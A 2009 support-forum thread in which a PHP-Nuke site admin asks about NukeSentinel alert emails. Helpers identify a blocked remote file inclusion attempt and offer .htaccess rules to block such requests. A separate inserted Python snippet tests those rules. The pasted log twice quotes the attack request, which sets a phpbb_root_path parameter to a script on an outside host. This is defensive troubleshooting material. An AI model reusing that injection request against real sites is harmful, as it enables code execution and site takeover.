Ravens PHP Scripts: Forums
 

 

hamrdeye
Hangin' Around



Joined: Aug 20, 2008
Posts: 28

PostPosted: Tue Sep 29, 2009 2:59 pm Reply with quote

I keep getting tons of these emails emailed to my admin account on our website. I recently updated to Raven Nuke from 8.1 phpnuke. I am getting like 10 a day, and I am not sure what is wrong as I am having difficulty understanding the message.

I can't paste the message here. I am getting "The resource/content requested is not in an acceptable format."

How can I supply the email?
 
kguske
Site Admin



Joined: Jun 04, 2004
Posts: 6433

PostPosted: Tue Sep 29, 2009 3:10 pm Reply with quote

Just paste the main text message from the email. It doesn't need to contain any formatting.

That said, without knowing what types of messages you're getting (i.e. which blockers are being triggered), are you using request method or string blockers? Also, harvester and referer blocks can be triggered frequently if these happen on your sites.

For some blocks, you may wish NOT to receive an email. For example, harvesters and referers are blocked before they can do anything on your site, so you probably don't need an email every time they visit. To turn off emails, just change the Activate setting for these blockers to something that does not include email.

_________________
I search, therefore I exist...
nukeSEO - nukeFEED - nukePIE - nukeSPAM - nukeWYSIWYG
 
hamrdeye







PostPosted: Tue Sep 29, 2009 8:24 pm Reply with quote

The message is from: Mail Delivery System
With a subject of : Mail delivery failed: returning message to sender

So it's like my site is trying to send something, but yet the email is from Nuke Sentinel.


I will attempt to paste again...

Code:
This message was created automatically by mail delivery software.


A message that you sent could not be delivered to one or more of its
recipients. This is a permanent error. The following address(es) failed:

  [ Only registered users can see links on this board! Get registered or login! ]
    Unrouteable address

------ This is a copy of the message, including all the headers. ------

Return-path: <dofadmin@teamdof.com>
Received: from teamdof by server307.serverquality.com with local (Exim 4.69)
(envelope-from <dofadmin@teamdof.com>)
id 1MsXzO-0002JD-Et
for [ Only registered users can see links on this board! Get registered or login! ]; Tue, 29 Sep 2009 03:23:14 -0500
To: e <w@server307.serverquality.com>
Subject: Blocked abuse from 195.186.64.229
From: [ Only registered users can see links on this board! Get registered or login! ]
Reply-To: [ Only registered users can see links on this board! Get registered or login! ]
Date: Tue, 29 Sep 2009 03:23:14 -0500
X-LibVersion: 3.3.2_4
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Message-ID: <20090929082314.8877.622664592.swift@www.teamdof.com>
X-ServerQuality-MailScanner-Information: Please contact the ISP for more information
X-ServerQuality-MailScanner-ID: 1MsXzO-0002JD-Et
X-ServerQuality-MailScanner: Found to be clean
X-ServerQuality-MailScanner-SpamCheck: not spam, SpamAssassin (not cached,
score=-2.6, required 7, autolearn=not spam, BAYES_00 -2.60,
NO_RELAYS -0.00)
X-ServerQuality-MailScanner-From: [ Only registered users can see links on this board! Get registered or login! ]
X-Spam-Status: No

Created By: NukeSentinel(tm) 2.6.02
Date & Time: 2009-09-29 03:23:14 CDT GMT -0500
Blocked IP: 195.186.64.229
User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
Referer: none
User Agent: Mozilla/5.0
HTTP Host: [ Only registered users can see links on this board! Get registered or login! ]
Script Name: /modules.php
Query String: name=Stories_Archive // arcade.php ? phpbb_root_path = http://www.karuturi.com/baner.txt???
Get String: name=Stories_Archive // arcade.php ? phpbb_root_path= http://www.karuturi.com/baner.txt???
Post String: Not Available
Forwarded For: none
Client IP: none
Remote Address: 195.186.64.229
Remote Port: 9463
Request Method: GET


Ok I had to add spaces to the Query String and Get String lines for the forum to allow the post..

I have got 15 of these so far today..

I do get emails to my admin account regarding blocked IPs but not this frequently.. I have no idea where the "w@server307.serverquality.com" is from...????
 
jakec
Site Admin



Joined: Feb 06, 2006
Posts: 3048
Location: United Kingdom

PostPosted: Wed Sep 30, 2009 12:21 am Reply with quote

Well it looks like someone has been attempting to hack your site, but NS has blocked them.

Check the email address set in your NS admin panel.
 
kd8hho
Worker



Joined: Mar 30, 2009
Posts: 132

PostPosted: Wed Sep 30, 2009 4:38 pm Reply with quote

Code:


Referer: none
User Agent: Mozilla/5.0
HTTP Host: [ Only registered users can see links on this board! Get registered or login! ]
Script Name: /modules.php
Query String: name=Stories_Archive // arcade.php ? phpbb_root_path = http://www.karuturi.com/baner.txt???
Get String: name=Stories_Archive // arcade.php ? phpbb_root_path= http://www.karuturi.com/baner.txt???
Post String: Not Available
Forwarded For: none
Client IP: none
Remote Address: 195.186.64.229
Remote Port: 9463
Request Method: GET


I get that a lot. IIRC it's trying to upload a shell script into your site. I think I block 5 to 10 a day myself.

Make sure your e-mail is set right in NS admin as jakec said.

_________________
Linux Register User #481509 | Ubuntu Register User #25492 
hamrdeye







PostPosted: Wed Sep 30, 2009 10:45 pm Reply with quote

Well the email was set wrong in NS.. I changed it. I think that stopped it.. Will report if it didn't..

Thanks for the help...

BTW - Should NS be blocking the offending IPs? Cause I have nothing in my blocked IP list. I have changed the permissions to 666 and the path appears to be right in NS prefs. Is there something else I need to do?
 
slackervaara
Worker



Joined: Aug 26, 2007
Posts: 236

PostPosted: Wed Sep 30, 2009 11:42 pm Reply with quote

If you add these lines in your .htaccess these types of hacks will be blocked prior to Sentinel and you will then not get any more of these emails:

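RewriteEngine On

# Refuse (403) any request whose request line contains "http://",
# literal or URL-encoded; [NC] also catches lower-case %3a%2f%2f.
RewriteCond %{THE_REQUEST} .*http:\/\/.* [NC,OR]
RewriteCond %{THE_REQUEST} .*http%3A%2F%2F.* [NC]
RewriteRule ^.* - [F]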
 
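A way to check what the rewrite rule in the post above does and does not cover, as an added example that is not part of the thread or of NukeSentinel: it emulates the two RewriteCond patterns against constructed request lines (placeholder hosts), with and without case-insensitive matching, and separately flags query parameters whose decoded value is a remote URL. The function names, the `inc` and `redirect` parameters and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Constructed request lines; remote.example is a placeholder host.
SAMPLES = [
    "GET /modules.php?name=Stories_Archive//arcade.php?phpbb_root_path=http://remote.example/baner.txt??? HTTP/1.1",
    "GET /modules.php?name=News&inc=http%3a%2f%2fremote.example%2fx.txt HTTP/1.1",
    "GET /modules.php?name=News&inc=ftp://remote.example/x.txt HTTP/1.1",
    "GET /index.php?redirect=http://www.example.org/ HTTP/1.1",
    "GET /modules.php?name=Forums&file=viewtopic&t=123 HTTP/1.1",
]

# The two RewriteCond patterns from the post, as one alternation.
RULE_PATTERN = r"http://|http%3A%2F%2F"

# Assumption (not part of the posted rule): a parameter is suspicious when its
# decoded value begins with an http, https or ftp URL.
URL_VALUE = re.compile(r"([\w\[\]]+)\s*=\s*(?:https?|ftp)://", re.IGNORECASE)


def rule_blocks(request_line, nocase=True):
    """Emulate the rule against THE_REQUEST (the raw, undecoded request line).

    nocase=True corresponds to adding [NC] to each RewriteCond.
    """
    flags = re.IGNORECASE if nocase else 0
    return re.search(RULE_PATTERN, request_line, flags) is not None


def remote_url_params(request_line):
    """Return names of query parameters whose value is a remote URL."""
    parts = request_line.split(" ")
    if len(parts) != 3 or "?" not in parts[1]:
        return []
    query = parts[1].split("?", 1)[1]
    # Decode twice so single- and double-encoded values look the same.
    decoded = unquote(unquote(query))
    return [m.group(1) for m in URL_VALUE.finditer(decoded)]


def triage(lines=SAMPLES):
    """(blocked with [NC], blocked without [NC], flagged params) per line."""
    return [(rule_blocks(l), rule_blocks(l, nocase=False), remote_url_params(l))
            for l in lines]


if __name__ == "__main__":
    for line, row in zip(SAMPLES, triage()):
        print(row, line)
```

The fourth sample is a legitimate redirect parameter that the rule also refuses, so a site that passes URLs in query strings needs an exception before deploying it.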
jakec







PostPosted: Thu Oct 01, 2009 12:21 am Reply with quote

Blocked IPs are saved in two places, the database and the .htaccess file. If this is not happening make sure the blocker settings are set correctly in NS.
 
hamrdeye







PostPosted: Thu Oct 01, 2009 10:17 am Reply with quote

It was the blocker settings. I will add the code to my .htaccess file also..

Thanks!
 
All times are GMT - 6 Hours
 